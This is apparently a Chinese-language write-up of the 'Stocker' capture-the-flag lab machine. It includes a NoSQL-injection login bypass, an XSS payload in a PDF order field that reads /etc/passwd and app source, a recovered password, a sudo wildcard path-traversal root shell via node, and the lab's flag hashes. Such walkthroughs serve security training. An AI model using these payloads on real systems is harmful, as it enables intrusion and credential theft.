[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升 ...

Information Gathering

IP AddressOpening Ports10.10.11.196TCP:22,80 $ ip='10.10.11.196'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

1. PORT   STATE SERVICE VERSION
2. 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
3. | ssh-hostkey:
4. |   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
5. |   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
6. |_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
7. 80/tcp open  http    nginx 1.18.0 (Ubuntu)
8. |_http-server-header: nginx/1.18.0 (Ubuntu)
9. |_http-title: Did not follow redirect to http://stocker.htb
10. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

复制代码

NOSQLI && PDF-XSS-LFI

# echo '10.10.11.196 stocker.htb' >>/etc/hosts

# echo '10.10.11.196 dev.stocker.htb' >>/etc/hosts
http://dev.stocker.htb/login

Content-Type: application/json

应用利用了 MongoDB 或其他类似的 NoSQL 数据库，往往会以 JSON 或类似的格式与数据库进行交互，因此很有大概是利用了 NoSQL 数据库，如 MongoDB。

1. POST /login HTTP/1.1
2. Host: dev.stocker.htb
3. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5. Accept-Language: en-US,en;q=0.5
6. Accept-Encoding: gzip, deflate
7. Content-Type: application/json
8. Content-Length: 44
9. Origin: http://dev.stocker.htb
10. Connection: close
11. Referer: http://dev.stocker.htb/login
12. Cookie: connect.sid=s%3AuHfFeLPGSEc-qATP1x8ZpvDMDTTh2SyF.GpEHRtc7UTTPI%2BNgRMpIzjDv%2BxO7AQkRUNu9Mq5TC5A
13. Upgrade-Insecure-Requests: 1
15. {"username":{"$ne":1},"password":{"$ne":1} }

复制代码

1. POST /api/order HTTP/1.1
2. Host: dev.stocker.htb
3. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5. Accept-Language: en-US,en;q=0.5
6. Accept-Encoding: gzip, deflate
7. Connection: close
8. Cookie: connect.sid=s%3AIJ_3Rtib4U9iyygfsOEt_uY6dpZp3FFc.h%2BYon1AR24qmHaPVmaeODrF%2Faav%2F%2Fe%2BdK22Vc%2BYmVRs
9. Upgrade-Insecure-Requests: 1
10. If-Modified-Since: Tue, 06 Dec 2022 09:53:59 GMT
11. If-None-Match: W/"2a9a-184e6db4279"
12. Content-Type: application/json
13. Content-Length: 392
16. {
17.   "basket": [
18.     {
19.       "_id": "638f116eeb060210cbd83a8d",
20.       "title": "Cup<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>",
21.       "description": "xxxxx",
22.       "image": "red-cup.jpg",
23.       "price": 32,
24.       "currentStock": 4,
25.       "__v": 0,
26.       "amount": 2
27.     }
28.   ]
29. }

复制代码

http://dev.stocker.htb/api/po/67a9a53e0e268a4cdd0b0bb9

读取设置文件

1. POST /api/order HTTP/1.1
2. Host: dev.stocker.htb
3. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5. Accept-Language: en-US,en;q=0.5
6. Accept-Encoding: gzip, deflate
7. Connection: close
8. Cookie: connect.sid=s%3AIJ_3Rtib4U9iyygfsOEt_uY6dpZp3FFc.h%2BYon1AR24qmHaPVmaeODrF%2Faav%2F%2Fe%2BdK22Vc%2BYmVRs
9. Upgrade-Insecure-Requests: 1
10. If-Modified-Since: Tue, 06 Dec 2022 09:53:59 GMT
11. If-None-Match: W/"2a9a-184e6db4279"
12. Content-Type: application/json
13. Content-Length: 402
16. {
17.   "basket": [
18.     {
19.       "_id": "638f116eeb060210cbd83a8d",
20.       "title": "Cup<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///var/www/dev/index.js");x.send();</script>",
21.       "description": "xxxxx",
22.       "image": "red-cup.jpg",
23.       "price": 32,
24.       "currentStock": 4,
25.       "__v": 0,
26.       "amount": 2
27.     }
28.   ]
29. }

复制代码

username:dev
password:IHeardPassphrasesArePrettySecure

User.txt

   950316457d8a4004ed601c5ba7e0ca53
  Privilege Escalation: * Bypass

$ echo 'require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]})'>/tmp/shell.js
$ sudo /usr/bin/node /usr/local/scripts/../../../tmp/shell.js
Root.txt

   5fa73a7f3cabba1172cc894e1043f27b

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。